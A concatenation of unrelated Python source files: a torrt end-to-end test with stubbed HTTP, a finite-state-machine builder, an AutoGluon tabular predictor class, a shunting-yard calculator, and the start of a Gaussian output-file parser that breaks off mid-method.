    """End-to-end: configure tracker and RPC, add a torrent, update it via
    walk(), then remove it — all against in-memory stubs."""
    # todo Dummy notifier
    # todo Dummy bot
    from torrt.utils import TorrtConfig

    class DummyConfig(TorrtConfig):
        # In-memory config so the test never touches the real config file.
        cfg = TorrtConfig._basic_settings

        @classmethod
        def bootstrap(cls):
            pass

        @classmethod
        def load(cls):
            return cls.cfg

        @classmethod
        def save(cls, settings_dict):
            cls.cfg = settings_dict

    def patch_requests(response_contents):
        # Make every HTTP GET return the given bytes, regardless of URL.
        monkeypatch.setattr('torrt.utils.Session.get', lambda self, url, **kwargs: DummyResponse(url, response_contents))

    torrent_one_hash = 'c815be93f20bf8b12fed14bee35c14b19b1d1984'
    torrent_one_data = (datafix_dir / 'torr_one.torrent').read_bytes()
    torrent_two_hash = '65f491bbdef45a26388a9337a91826a75c4c59fb'
    torrent_two_data = (datafix_dir / 'torr_two.torrent').read_bytes()

    class DummyResponse(object):
        # Minimal stand-in for a requests Response; only .content is consumed.
        def __init__(self, url, data):
            self.url = url
            self.data = data

        @property
        def content(self):
            return self.data

    patch_requests(torrent_one_data)
    monkeypatch.setattr('torrt.utils.config', DummyConfig)
    monkeypatch.setattr('torrt.toolbox.config', DummyConfig)
    # Isolate the global RPC object registry; restored in the finally block.
    rpc_old = RPCObjectsRegistry._items
    RPCObjectsRegistry._items = {}
    try:
        configure_tracker('dummy.local', {})
        assert configure_rpc('dummy', {}).enabled
        toggle_rpc('dummy')  # Enable RPC in config.
        bootstrap()
        rpc_dummy = RPCObjectsRegistry.get('dummy')
        # Add new torrent.
        add_torrent_from_url('http://dummy-a.local/id/one')
        assert len(rpc_dummy.torrents) == 1
        assert torrent_one_hash in rpc_dummy.torrents
        assert torrent_one_hash in get_registered_torrents()
        # Walk and update.
        patch_requests(torrent_two_data)
        walk(forced=True)
        assert len(rpc_dummy.torrents) == 1
        assert torrent_two_hash in rpc_dummy.torrents
        # Remove updated.
        remove_torrent(torrent_two_hash)
        assert not rpc_dummy.torrents
        assert torrent_one_hash not in get_registered_torrents()
        assert torrent_two_hash not in get_registered_torrents()
    finally:
        RPCObjectsRegistry._items = rpc_old
|
<filename>gfsm/fsm_builder/fsm_builder.py
import operation_loader
import sys
from gfsm.transition import Transition
from gfsm.event import Event
from gfsm.state import State
from ..action import fsm_action
class FsmBuilder():
    """Builds an FSM implementation dict (events, states, transitions and the
    init/first-state wiring) from a config mapping and an FSM definition."""

    def __init__(self, config, definition):
        self.config = config          # runtime/environment configuration
        self.definition = definition  # declarative FSM description
        self.action_wrapper = fsm_action  # default wrapper for user actions

    @staticmethod
    def is_correct_action_name(name):
        """Return True for a non-blank dotted name of at least 3 characters
        (e.g. 'module.func'), the form operation_loader can resolve."""
        if name and name.strip() and len(name) >= 3 and '.' in name:
            return True
        return False

    @staticmethod
    def get_value(data, key):
        """Return data[key] for a non-blank key present in data, else ''.

        Missing keys deliberately collapse to an empty string so downstream
        checks like is_correct_action_name() treat them as "not configured".
        """
        if key and key.strip() and key in data:
            return data[key]
        return ''

    def set_runtime_environment(self):
        """Extend sys.path from config and install the user's action wrapper,
        if one is configured."""
        user_actions_paths = self.get_value(self.config, 'user-actions-paths')
        for path in user_actions_paths:
            sys.path.append(path)
        user_action_wrapper_path = self.get_value(self.config, 'user-action-wrapper-path')
        # NOTE(review): a one-character path (e.g. '.') is skipped by this
        # length check — confirm whether that is intentional.
        if len(user_action_wrapper_path) > 1:
            sys.path.append(user_action_wrapper_path)
        user_action_wrapper_name = self.get_value(self.config, 'user-action-wrapper-name')
        if self.is_correct_action_name(user_action_wrapper_name):
            self.action_wrapper = operation_loader.get(user_action_wrapper_name)

    # Load the action from actions implementation by name
    def load_action(self, action_name):
        """Resolve `action_name` to a wrapped callable, or None when the name
        is blank/invalid. A '____' prefix forces the default fsm_action
        wrapper instead of the user-configured one."""
        if self.is_correct_action_name(action_name):
            if action_name.startswith('____'):
                # use default action's wrapper
                action_name = action_name[4:]
                return fsm_action(operation_loader.get(action_name))
            return self.action_wrapper(operation_loader.get(action_name))
        return None

    def build_state(self, state_def, idx):
        """Create a State from its definition, using `idx` as the state id."""
        name = self.get_value(state_def, 'name')
        state = State(idx, name)
        state.entry_action = self.load_action(self.get_value(state_def, 'entry-action'))
        state.exit_action = self.load_action(self.get_value(state_def, 'exit-action'))
        return state

    def build_transition(self, tr_def, states):
        """Create a Transition and register it on its source state, keyed by
        the triggering event name."""
        tr_name = self.get_value(tr_def, 'name')
        tr_event = self.get_value(tr_def, 'event')
        target = states[self.get_value(tr_def, 'target')]
        action = self.load_action(self.get_value(tr_def, 'action'))
        transition = Transition(tr_name, target, action)
        if 'start-action' in tr_def:
            transition.start_action = self.load_action(self.get_value(tr_def, 'start-action'))
        if 'end-action' in tr_def:
            transition.end_action = self.load_action(self.get_value(tr_def, 'end-action'))
        # associate the event with Transition via State
        src = states.get(self.get_value(tr_def, 'src'))
        src.transitions[tr_event] = transition
        return transition

    def build_transitions(self, trs_def, states):
        """Build every transition in `trs_def` into the `states` mapping."""
        for tr_def in trs_def:
            self.build_transition(tr_def, states)
        return

    def build(self):
        """Assemble and return the FSM implementation dict with keys
        'init-action', 'events', 'first-state' and 'states'."""
        self.set_runtime_environment()
        # Fixed typo in the log message: "bulder" -> "builder".
        print("FSM builder. Build the fsm implementation from: {}".format(self.config['info']))
        fsm_implementation = {}
        # build events
        events_def = self.config['events']
        events = {}
        for en in events_def:
            events[en] = Event(en)
        # build states (indexed by name; ids are positional)
        states_def = self.get_value(self.definition, 'states')
        states = {}
        for i, state_def in enumerate(states_def):
            state = self.build_state(state_def, i)
            states[state.name] = state
        # build transitions and associate events with Transition via State
        for state_def in states_def:
            trs_def = self.get_value(state_def, 'transitions')
            self.build_transitions(trs_def, states)
        # get init action
        init_action = self.load_action(self.get_value(self.definition, 'init-action'))
        # Setup FSM implementation
        fsm_implementation['init-action'] = init_action
        fsm_implementation['events'] = events
        fsm_implementation['first-state'] = states[self.get_value(self.definition, 'first-state')]
        fsm_implementation['states'] = states
        return fsm_implementation
|
<filename>autogluon/task/tabular_prediction/predictor.py
import logging
import pandas as pd
from .dataset import TabularDataset
from ..base.base_predictor import BasePredictor
from ...utils import plot_performance_vs_trials, plot_summary_of_models, plot_tabular_models, verbosity2loglevel
from ...utils.tabular.ml.constants import REGRESSION
from ...utils.tabular.ml.learner.default_learner import DefaultLearner as Learner
from ...utils.tabular.ml.utils import setup_outputdir
__all__ = ['TabularPredictor']
logger = logging.getLogger() # return root logger
class TabularPredictor(BasePredictor):
""" Object returned by `fit()` in Tabular Prediction tasks.
Use for making predictions on new data and viewing information about models trained during `fit()`.
Attributes
----------
output_directory : str
Path to directory where all models used by this Predictor are stored.
problem_type : str
What type of prediction problem this Predictor has been trained for.
eval_metric : function or str
What metric is used to evaluate predictive performance.
label_column : str
Name of table column that contains data from the variable to predict (often referred to as: labels, response variable, target variable, dependent variable, Y, etc).
feature_types : dict
Inferred data type of each predictive variable (i.e. column of training data table used to predict `label_column`).
model_names : list
List of model names trained during `fit()`.
model_performance : dict
Maps names of trained models to their predictive performance values attained on the validation dataset during `fit()`.
class_labels : list
For multiclass problems, this list contains the class labels in sorted order of `predict_proba()` output. Is = None for problems that are not multiclass.
For example if `pred = predict_proba(x)`, then ith index of `pred` provides predicted probability that `x` belongs to class given by `class_labels[i]`.
Examples
--------
>>> from autogluon import TabularPrediction as task
>>> train_data = task.Dataset(file_path='https://autogluon.s3-us-west-2.amazonaws.com/datasets/Inc/train.csv')
>>> predictor = task.fit(train_data=train_data, label='class')
>>> results = predictor.fit_summary()
>>> test_data = task.Dataset(file_path='https://autogluon.s3-us-west-2.amazonaws.com/datasets/Inc/test.csv')
>>> perf = predictor.evaluate(test_data)
"""
    def __init__(self, learner):
        """ Creates TabularPredictor object.
        You should not construct a TabularPredictor yourself, it is only intended to be produced during fit().

        Parameters
        ----------
        learner : `AbstractLearner` object
            Object that implements the `AbstractLearner` APIs.

        To access any learner method `func()` from this Predictor, use: `predictor._learner.func()`.
        To access any trainer method `func()` from this `Predictor`, use: `predictor._trainer.func()`.
        """
        self._learner = learner  # Learner object
        self._trainer = self._learner.load_trainer()  # Trainer object
        # Public attributes mirror learner/trainer state as of construction time.
        self.output_directory = self._learner.path_context
        self.problem_type = self._learner.problem_type
        self.eval_metric = self._learner.objective_func
        self.label_column = self._learner.label
        self.feature_types = self._trainer.feature_types_metadata
        self.model_names = self._trainer.get_model_names_all()
        self.model_performance = self._trainer.model_performance
        self.class_labels = self._learner.class_labels
    def predict(self, dataset, model=None, as_pandas=False, use_pred_cache=False, add_to_pred_cache=False):
        """ Use trained models to produce predicted labels (in classification) or response values (in regression).

        Parameters
        ----------
        dataset : str or :class:`TabularDataset` or `pandas.DataFrame`
            The dataset to make predictions for. Should contain same column names as training Dataset and follow same format
            (may contain extra columns that won't be used by Predictor, including the label-column itself).
            If str is passed, `dataset` will be loaded using the str value as the file path.
        model : str (optional)
            The name of the model to get predictions from. Defaults to None, which uses the highest scoring model on the validation set.
        as_pandas : bool (optional)
            Whether to return the output as a pandas Series (True) or numpy array (False)
        use_pred_cache : bool (optional)
            Whether to used previously-cached predictions for table rows we have already predicted on before
            (can speedup repeated runs of `predict()` on multiple datasets with overlapping rows between them).
        add_to_pred_cache : bool (optional)
            Whether these predictions should be cached for reuse in future `predict()` calls on the same table rows
            (can speedup repeated runs of `predict()` on multiple datasets with overlapping rows between them).

        Returns
        -------
        Array of predictions, one corresponding to each row in given dataset. Either numpy Ndarray or pandas Series depending on `as_pandas` argument.
        """
        # Normalizes `dataset` (loads from file path when a str is passed — see docstring).
        dataset = self.__get_dataset(dataset)
        return self._learner.predict(X_test=dataset, model=model, as_pandas=as_pandas, use_pred_cache=use_pred_cache, add_to_pred_cache=add_to_pred_cache)
    def predict_proba(self, dataset, model=None, as_pandas=False):
        """ Use trained models to produce predicted class probabilities rather than class-labels (if task is classification).

        Parameters
        ----------
        dataset : str or :class:`TabularDataset` or `pandas.DataFrame`
            The dataset to make predictions for. Should contain same column names as training Dataset and follow same format
            (may contain extra columns that won't be used by Predictor, including the label-column itself).
            If str is passed, `dataset` will be loaded using the str value as the file path.
        model : str (optional)
            The name of the model to get prediction probabilities from. Defaults to None, which uses the highest scoring model on the validation set.
        as_pandas : bool (optional)
            Whether to return the output as a pandas object (True) or numpy array (False).
            Pandas object is a DataFrame if this is a multiclass problem, otherwise it is a Series.

        Returns
        -------
        Array of predicted class-probabilities, corresponding to each row in the given dataset.
        May be a numpy Ndarray or pandas Series/Dataframe depending on `as_pandas` argument and the type of prediction problem.
        """
        # Normalizes `dataset` (loads from file path when a str is passed — see docstring).
        dataset = self.__get_dataset(dataset)
        return self._learner.predict_proba(X_test=dataset, model=model, as_pandas=as_pandas)
def evaluate(self, dataset, silent=False):
""" Report the predictive performance evaluated for a given Dataset.
This is basically a shortcut for: `pred = predict(dataset); evaluate_predictions(dataset[label_column], preds, auxiliary_metrics=False)`
that automatically uses `predict_proba()` instead of `predict()` when appropriate.
Parameters
----------
dataset : str or :class:`TabularDataset` or `pandas.DataFrame`
This Dataset must also contain the label-column with the same column-name as specified during `fit()`.
If str is passed, `dataset` will be loaded using the str value as the file path.
silent : bool (optional)
Should performance results be printed?
Returns
-------
Predictive performance value on the given dataset, based on the `eval_metric` used by this Predictor.
"""
dataset = self.__get_dataset(dataset)
perf = self._learner.score(dataset)
sign = self._learner.objective_func._sign
perf = perf * sign # flip negative once again back to positive (so higher is no longer necessarily better)
if not silent:
print("Predictive performance on given dataset: %s = %s" % (self.eval_metric, perf))
return perf
    def evaluate_predictions(self, y_true, y_pred, silent=False, auxiliary_metrics=False, detailed_report=True):
        """ Evaluate the provided predictions against ground truth labels.

        Parameters
        ----------
        y_true : list or `numpy.array`
            The ordered collection of ground-truth labels.
        y_pred : list or `numpy.array`
            The ordered collection of predictions.
            For certain types of `eval_metric` (such as AUC), `y_pred` must be predicted-probabilities rather than predicted labels.
        silent : bool (optional)
            Should performance results be printed?
        auxiliary_metrics: bool (optional)
            Should we compute other (`problem_type` specific) metrics in addition to the default metric?
        detailed_report : bool (optional)
            Should we computed more detailed versions of the `auxiliary_metrics`? (requires `auxiliary_metrics = True`)

        Returns
        -------
        Scalar performance value if `auxiliary_metrics = False`.
        If `auxiliary_metrics = True`, returns dict where keys = metrics, values = performance along each metric.
        """
        # Thin delegation; all evaluation logic lives in the learner.
        return self._learner.evaluate(y_true=y_true, y_pred=y_pred, silent=silent,
                                      auxiliary_metrics=auxiliary_metrics, detailed_report=detailed_report)
def leaderboard(self, dataset=None, silent=False):
"""
Output summary of information about models produced during fit() as a pandas DataFrame.
Includes information on test and validation scores for all models, model training times and stack levels.
Parameters
----------
dataset : str or :class:`TabularDataset` or `pandas.DataFrame` (optional)
This Dataset must also contain the label-column with the same column-name as specified during fit().
If specified, then the leaderboard returned will contain an additional column 'score_test'
'score_test' is the score of the model on the validation_metric for the dataset provided
If str is passed, `dataset` will be loaded using the str value as the file path.
silent: bool (optional)
Should leaderboard DataFrame be printed?
Returns
-------
Pandas `pandas.DataFrame` of model performance summary information.
"""
dataset = self.__get_dataset(dataset) if dataset is not None else dataset
return self._learner.leaderboard(X=dataset, silent=silent)
def fit_summary(self, verbosity=3):
    """
    Output summary of information about models produced during `fit()`.
    May create various generated summary plots and store them in folder: `Predictor.output_directory`.

    Parameters
    ----------
    verbosity : int, default = 3
        Controls how detailed of a summary to output.
        Set <= 0 for no output printing, 1 to print just high-level summary,
        2 to print summary and create plots, >= 3 to print all information produced during fit().

    Returns
    -------
    Dict containing various detailed information. We do not recommend directly printing this dict as it may be very large.
    """
    # True when fit() recorded any hyperparameter-optimization results
    hpo_used = len(self._trainer.hpo_results) > 0
    # dict: model-name -> class name of the model (class objects dropped)
    model_typenames = {key: self._trainer.model_types[key].__name__ for key in self._trainer.model_types}
    unique_model_types = set(model_typenames.values())  # no more class info
    # all fit() information that is returned:
    results = {
        'model_types': model_typenames,  # dict with key = model-name, value = type of model (class-name)
        'model_performance': self.model_performance,  # dict with key = model-name, value = validation performance
        'model_best': self._trainer.model_best,  # the name of the best model (on validation data)
        'model_paths': self._trainer.model_paths,  # dict with key = model-name, value = path to model file
        'model_fit_times': self._trainer.model_fit_times,
        'model_pred_times': self._trainer.model_pred_times,
        'num_bagging_folds': self._trainer.kfolds,
        'stack_ensemble_levels': self._trainer.stack_ensemble_levels,
        'feature_prune': self._trainer.feature_prune,
        'hyperparameter_tune': hpo_used,
        'hyperparameters_userspecified': self._trainer.hyperparameters,
    }
    if self.problem_type != REGRESSION:
        results['num_classes'] = self._trainer.num_classes
    if hpo_used:
        results['hpo_results'] = self._trainer.hpo_results
    # get dict mapping model name to final hyperparameter values for each model:
    # NOTE(review): this loads every model from disk just to read .params —
    # assumed acceptable cost for a summary call; confirm for large ensembles.
    model_hyperparams = {}
    for model_name in results['model_performance']:
        model_obj = self._trainer.load_model(model_name)
        model_hyperparams[model_name] = model_obj.params
    results['model_hyperparams'] = model_hyperparams
    if verbosity > 0:  # print stuff
        print("*** Summary of fit() ***")
        print("Number of models trained: %s" % len(results['model_performance']))
        print("Types of models trained: ")
        print(unique_model_types)
        self._summarize('model_performance', 'Validation performance of individual models', results)
        self._summarize('model_best', 'Best model (based on validation performance)', results)
        self._summarize('hyperparameter_tune', 'Hyperparameter-tuning used', results)
        num_fold_str = ""
        bagging_used = results['num_bagging_folds'] > 0
        if bagging_used:
            num_fold_str = f" (with {results['num_bagging_folds']} folds)"
        print("Bagging used: %s %s" % (bagging_used, num_fold_str))
        num_stack_str = ""
        stacking_used = results['stack_ensemble_levels'] > 0
        if stacking_used:
            num_stack_str = f" (with {results['stack_ensemble_levels']} levels)"
        print("Stack-ensembling used: %s %s" % (stacking_used, num_stack_str))
        # TODO: uncomment once feature_prune is functional: self._summarize('feature_prune', 'feature-selection used', results)
        print("User-specified hyperparameters:")
        print(results['hyperparameters_userspecified'])
    if verbosity > 1:  # create plots
        plot_tabular_models(results, output_directory=self.output_directory,
                            save_file="SummaryOfModels.html",
                            plot_title="Models produced during fit()")
        if hpo_used:
            # One summary plot + one performance-vs-trials plot per model type
            for model_type in results['hpo_results']:
                plot_summary_of_models(
                    results['hpo_results'][model_type],
                    output_directory=self.output_directory, save_file=model_type + "_HPOmodelsummary.html",
                    plot_title=f"Models produced during {model_type} HPO")
                plot_performance_vs_trials(
                    results['hpo_results'][model_type],
                    output_directory=self.output_directory, save_file=model_type + "_HPOperformanceVStrials.png",
                    plot_title=f"HPO trials for {model_type} models")
    if verbosity > 2:  # print detailed information
        if hpo_used:
            hpo_results = results['hpo_results']
            print("*** Details of Hyperparameter optimization ***")
            for model_type in hpo_results:
                hpo_model = hpo_results[model_type]
                print("HPO for %s model: Num. configurations tried = %s, Time spent = %s, Search strategy = %s"
                      % (model_type, len(hpo_model['trial_info']), hpo_model['total_time'], hpo_model['search_strategy']))
                print("Best hyperparameter-configuration (validation-performance: %s = %s):"
                      % (self.eval_metric, hpo_model['validation_performance']))
                print(hpo_model['best_config'])
        # The block below is intentionally disabled (no-op string statement)
        """
        if bagging_used:
            pass  # TODO: print detailed bagging info
        if stacking_used:
            pass  # TODO: print detailed stacking info, like how much it improves validation performance
        if results['feature_prune']:
            pass  # TODO: print detailed feature-selection info once feature-selection is functional.
        """
    if verbosity > 0:
        print("*** End of fit() summary ***")
    return results
@classmethod
def load(cls, output_directory, verbosity=2):
    """
    Load a predictor object previously produced by `fit()` from file and returns this object.
    Is functionally equivalent to :meth:`autogluon.task.tabular_prediction.TabularPrediction.load`.

    Parameters
    ----------
    output_directory : str
        Path to directory where trained models are stored (i.e. the `output_directory` specified in previous call to `fit()`).
    verbosity : int, default = 2
        Verbosity levels range from 0 to 4 and control how much information is generally printed by this Predictor.
        Higher levels correspond to more detailed print statements (you can set verbosity = 0 to suppress warnings).
        If using logging, you can alternatively control amount of information printed via `logger.setLevel(L)`,
        where `L` ranges from 0 to 50 (Note: higher values `L` correspond to fewer print statements, opposite of verbosity levels)

    Returns
    -------
    :class:`TabularPredictor` object
    """
    # Reset logging after load (we may be running in a brand-new Python session)
    logger.setLevel(verbosity2loglevel(verbosity))
    if output_directory is None:
        raise ValueError("output_directory cannot be None in load()")
    # Expand '~' and normalize to an absolute path before loading
    normalized_dir = setup_outputdir(output_directory)
    return cls(learner=Learner.load(normalized_dir))
def save(self):
    """Persist this predictor into its `output_directory`.

    Note that `fit()` already saves the predictor object automatically, and
    modifying the Predictor object by hand is discouraged since it tracks
    many trained models.
    """
    self._learner.save()
    message = "TabularPredictor saved. To load, use: TabularPredictor.load(%s)" % self.output_directory
    logger.log(20, message)
@staticmethod
def _summarize(key, msg, results):
    # Print "<msg>: <value>" for `key`; absent keys are skipped silently.
    if key not in results:
        return
    print(msg + ": " + str(results[key]))
@staticmethod
def __get_dataset(dataset):
    """Coerce `dataset` into a TabularDataset.

    Accepts an existing TabularDataset (returned as-is), a str file path
    (loaded from disk), or a pandas.DataFrame (wrapped).  A pandas.Series
    gets a dedicated error message; anything else raises a generic TypeError.
    """
    if isinstance(dataset, TabularDataset):
        return dataset
    if isinstance(dataset, str):
        return TabularDataset(file_path=dataset)
    if isinstance(dataset, pd.DataFrame):
        return TabularDataset(df=dataset)
    if isinstance(dataset, pd.Series):
        # BUG FIX: the original literal used a backslash line-continuation
        # *inside* the string, embedding a long run of source indentation
        # into the user-visible message; implicit concatenation keeps the
        # message clean.
        raise TypeError(
            "dataset must be TabularDataset or pandas.DataFrame, not pandas.Series. "
            "To predict on just single example (ith row of table), use dataset.iloc[[i]] rather than dataset.iloc[i]")
    raise TypeError("dataset must be TabularDataset or pandas.DataFrame or str file path to dataset")
|
<reponame>AdrianAndersen/TDT4113-Computer-Science-Programming-Project<filename>4-Calculator/Calculator.py<gh_stars>0
import numbers
import re
import numpy
from Function import Function
from logger.Logger import Logger
from Operator import Operator
from Queue import Queue
from Stack import Stack
class Calculator:
    """Shunting-yard style calculator.

    A text expression is tokenized into `input_queue`, converted to reverse
    polish notation (RPN) in `output_queue` and finally evaluated with a
    working stack.
    """

    _logger = Logger()

    def __init__(self, input_queue=None):
        """Set up the supported functions/operators and the work containers.

        Parameters
        ----------
        input_queue : Queue, optional
            Pre-filled token queue.  BUG FIX: the original signature used
            `input_queue=Queue()` — a mutable default evaluated once at class
            definition time and therefore *shared by every Calculator
            instance*.  A fresh Queue is now created per instance.
        """
        self.functions = {
            "EXP": Function(numpy.exp),
            "LOG": Function(numpy.log),
            "SIN": Function(numpy.sin),
            "COS": Function(numpy.cos),
            "SQRT": Function(numpy.sqrt),
        }
        # Second Operator argument is the binding strength (precedence).
        self.operators = {
            "ADD": Operator(numpy.add, 0),
            "MULTIPLY": Operator(numpy.multiply, 1),
            "DIVIDE": Operator(numpy.divide, 1),
            "SUBTRACT": Operator(numpy.subtract, 0),
        }
        self.output_queue = Queue()
        self.input_queue = Queue() if input_queue is None else input_queue
        self.operator_stack = Stack()

    def calculate_expression(self, txt):
        """Tokenize `txt`, convert it to RPN, then evaluate the RPN queue.

        Returns the working Stack; after a well-formed expression it holds
        exactly one element: the numeric result.
        """
        self.create_input_queue(txt)
        self._logger.debug(f"inp_text: {txt}")
        self._logger.debug(f"inp_queue: {self.input_queue}")
        self.create_output_queue()
        temp = Stack()
        self._logger.debug("\n\n\n\n\n\nSTART CALCULATE\n\n\n\n")
        while not self.output_queue.is_empty():
            self._logger.debug(f"output_queue: {self.output_queue}")
            self._logger.debug(f"temp: {temp}")
            top_peek = self.output_queue.peek()
            if isinstance(top_peek, Function):
                func = self.output_queue.pop()
                temp.push(func.execute(temp.pop()))
            elif isinstance(top_peek, Operator):
                operator = self.output_queue.pop()
                temp1 = temp.pop()
                temp2 = temp.pop()
                # temp1 was pushed last, so it is the RIGHT operand.
                temp.push(operator.execute(temp2, temp1))
            else:
                temp.push(self.output_queue.pop())
        self._logger.info(f"result: {temp}")
        return temp

    def create_output_queue(self):
        """Convert `input_queue` (infix) into `output_queue` (RPN) with the
        shunting-yard algorithm and return the output queue."""
        self.output_queue = Queue()
        while not self.input_queue.is_empty():
            elem = self.input_queue.pop()
            if isinstance(elem, numbers.Number):
                self.output_queue.push(elem)
            if isinstance(elem, str) and len(elem) > 1:
                elem = elem.upper()
            # Replace recognized keywords by their Function/Operator objects
            if elem in self.functions.keys():
                elem = self.functions[elem]
            if elem in self.operators.keys():
                elem = self.operators[elem]
            if isinstance(elem, Function) or elem == "(":
                self.operator_stack.push(elem)
            if elem == ")":
                # Pop operators until the matching '(' is found
                while self.operator_stack.peek() != "(":
                    operator = self.operator_stack.pop()
                    self.output_queue.push(operator)
                if self.operator_stack.peek() == "(":
                    self.operator_stack.pop()
                # A function directly before '(' applies to the whole group
                if isinstance(self.operator_stack.peek(), Function):
                    func = self.operator_stack.pop()
                    self.output_queue.push(func)
            if isinstance(elem, Operator):
                # Pop stronger (or equal) operators before pushing this one
                while True:
                    top_elem = self.operator_stack.peek()
                    if (
                        self.operator_stack.is_empty()
                        or top_elem == "("
                        or (
                            isinstance(top_elem, Operator)
                            and top_elem.get_strength() < elem.get_strength()
                        )
                    ):
                        break
                    operator = self.operator_stack.pop()
                    self.output_queue.push(operator)
                self.operator_stack.push(elem)
            self._logger.debug(f"output_queue: {self.output_queue}")
        # Flush whatever operators remain on the stack
        while not self.operator_stack.is_empty():
            operator = self.operator_stack.pop()
            self.output_queue.push(operator)
        return self.output_queue

    def create_input_queue(self, text):
        """Split `text` into tokens, converting numeric literals to float,
        and return the freshly built input queue."""
        text = text.upper()
        # Pad parentheses so that split() isolates them as their own tokens
        text = text.replace("(", "( ")
        text = text.replace(")", " )")
        input_list = text.split()
        self.input_queue = Queue()
        for elem in input_list:
            # Numeric literal: plain digits, a leading minus, or a decimal
            # point.  (Leftover debug print removed.)
            if elem.isnumeric() or elem[0] == "-" or "." in elem:
                elem = float(elem)
            self.input_queue.push(elem)
        return self.input_queue
|
<reponame>maserasgroup-repo/pyssian
"""
One of the two core libraries of pyssian. Contains the Classes that represent
Gaussian Files (input and output).
"""
import io
import re
from itertools import chain
from .chemistryutils import is_method, is_basis
from .linkjobparsers import LinkJob, GeneralLinkJob
# Pre-initialized dictionary for the GaussianOutFile.Parse: default every
# link number to GeneralLinkJob, then overlay the specialized parsers that
# registered themselves in LinkJob.Register.
Available_Linkjobs = {number: GeneralLinkJob for number in range(1, 10000)}
Available_Linkjobs.update(LinkJob.Register)
class GaussianOutFile(object):
    """Gaussian 09/16 '.log' file parent class, if any special type of calculation
    requires different processing it should be a subclass of this one. Accepts
    a context manager usage similar to 'with open(file) as F:...'

    Parameters
    ----------
    file : io.TextIOBase or str
        File instance (Result of open(filename,'r')) or valid filename.
    parselist : list
        List of integers that represent which types of Links to parse
        (the default is None, meaning parse everything).

    Attributes
    ----------
    InternalJobs
        List of InternalJobs done by gaussian, i.e. a gaussian calculation with
        the opt freq keywords will run first an InternalJob for the Optimization
        and after an InternalJob for the Frequency calculation.
    """

    _interblock = -1   # token for text found between two Link blocks
    _EOF = -9999       # token signalling that the end of the file was reached

    def __init__(self, file, parselist=None):
        cls = self.__class__
        self.InternalJobs = [InternalJob(), ]
        if isinstance(file, io.TextIOBase):
            self._file = file
        else:
            self._file = open(file, 'r')
        if parselist is None:
            parselist = []
        # Select the constructor used for each LinkJob number
        self._SetParsers(parselist, cls._interblock)
        # Initialize the generator/coroutine pair and advance them to their
        # first yield so that update() can drive them immediately
        self._BlockFetcher = self.BlockFetcher(cls._EOF, cls._interblock)
        _ = next(self._BlockFetcher)
        self._BlockHandler = self.BlockHandler()
        _ = next(self._BlockHandler)

    def __repr__(self):
        cls = type(self).__name__
        file = self._file.name.split('/')[-1]
        size = len(self)
        return f'<{cls}({file})> with {size} InternalJobs'

    def __str__(self):
        # NOTE: locals renamed from the original `repr`/`InternalJob`, which
        # shadowed the builtin and the InternalJob class respectively.
        cls = type(self).__name__
        file = self._file.name.split('/')[-1]
        text = f'<{cls}({file})>\n'
        indent = '    '
        for internal_job in self:
            text += indent + f'{internal_job} type <{internal_job.type}>\n'
            for link in internal_job:
                text += indent * 2 + f'{link}\n'
        return text

    def __len__(self):
        return len(self.InternalJobs)

    def __getitem__(self, index):
        return self.InternalJobs[index]

    def __enter__(self):
        ''' Wrapper to have similar behaviour to "_io.TextIOWrapper" '''
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        ''' Wrapper to have similar behaviour to "_io.TextIOWrapper" '''
        return self._file.__exit__(exc_type, exc_value, traceback)

    def _SetParsers(self, ParseList, interblock=-1):
        # Copy so the module-level registry is never mutated
        Parsers = Available_Linkjobs.copy()
        assert interblock not in Parsers
        if ParseList:
            if ParseList[0] == -1:  # flag meaning "parse all links as empty"
                for key in Parsers:
                    Parsers[key] = Parsers[key].as_empty
            else:  # keep full parsing only for the requested link numbers
                for key in Parsers:
                    if key not in ParseList:
                        Parsers[key] = Parsers[key].as_empty
        else:  # empty list -> parse everything normally
            pass
        Parsers[interblock] = GeneralLinkJob.as_empty
        self._Parsers = Parsers

    def print_file_structure(self):
        """Display the structure of links and internal jobs of the file."""
        indent = "    "
        Result = f"{self!r}\n"
        for intjob in self:
            Result += indent + f"{intjob!r}\n"
            for link in intjob:
                Result += indent * 2 + f"{link!r}\n"
        print(Result)

    def read(self):
        """Alias of update for consistency with GaussianInFile class"""
        self.update()

    def close(self):
        """Alias to file.close for consistency with the io.TextIOBase class"""
        self._file.close()

    def update(self, clean=True, FinalPrint=False):
        """Tries to fetch new data. If it exists it parses it appropriately,
        otherwise it fails silently.

        Parameters
        ----------
        clean : Bool
            If True removes all the EmptyLinkJobs found (the default is True).
        FinalPrint : Bool
            If True after a normal execution has finished it will print in the
            console a message to notify the user (the default is False).
        """
        cls = self.__class__
        BlockFetcher = self._BlockFetcher
        BlockHandler = self._BlockHandler
        BlockType, Block = next(BlockFetcher)
        while BlockType != cls._EOF:
            BlockHandler.send((BlockType, Block))
            BlockType, Block = next(BlockFetcher)
        if self.InternalJobs[0].number is None:
            self.InternalJobs[0].guess_info()
        if clean:
            self.clean()
        if FinalPrint:
            # BUG FIX: the original wrote f"{self:!r}", passing '!r' as a
            # *format spec* (which raises at runtime); the conversion must be
            # written before the colon as '{self!r}'.
            print(f"{self!r} UPDATED")

    def clean(self):
        """Removes per each InternalJob stored all the EmptyLinkJobs."""
        # (loop variable renamed: it used to shadow the InternalJob class)
        for internal_job in self.InternalJobs:
            internal_job.clean()

    def get_links(self, *LinkIds):
        """Wrapper Method to get a list of Links with certain Ids across
        the different Internal Jobs.

        Parameters
        ----------
        *LinkIds : int
            Integers that correspond to the type of links to be returned.

        Returns
        -------
        list
        """
        LinkLists = [IntJob.get_links(*LinkIds) for IntJob in self.InternalJobs]
        return list(chain(*LinkLists))

    # Generators and Coroutines for File Parsing
    def Reader(self, file):
        """ Generator for line by line reading without StopIteration; yields
        (ReachedEOF, line) where ReachedEOF becomes True once the file
        position stops advancing. """
        while True:
            Pos_old = file.tell()
            line = file.readline()
            Pos_new = file.tell()
            ReachedEOF = Pos_old == Pos_new
            yield ReachedEOF, line

    def BlockFetcher(self, EOF=-9999, interblock=-1):
        """
        Generator that yields the text sliced in blocks and their type.
        A block is an iterable of strings and its type refers to a token that
        can be recognized by the ._Parsers variable, something in between
        Link Blocks (interblock=-1) or no end was found (EOF=-9999)
        """
        # Regex generation: link entry, link exit, and termination markers
        re_enter = re.compile(r'(?:Enter.*l)([0-9]{1,4})(?:\.exe)')
        re_exit = re.compile(r'(?:Leave\s*Link\s*)([0-9]{1,4})')
        re_termination = re.compile(r'\s?([a-zA-Z]*)\stermination')
        # Initialize the Reader generator
        Reader = self.Reader(self._file)
        yield 'Initialization done'
        while True:
            start = False
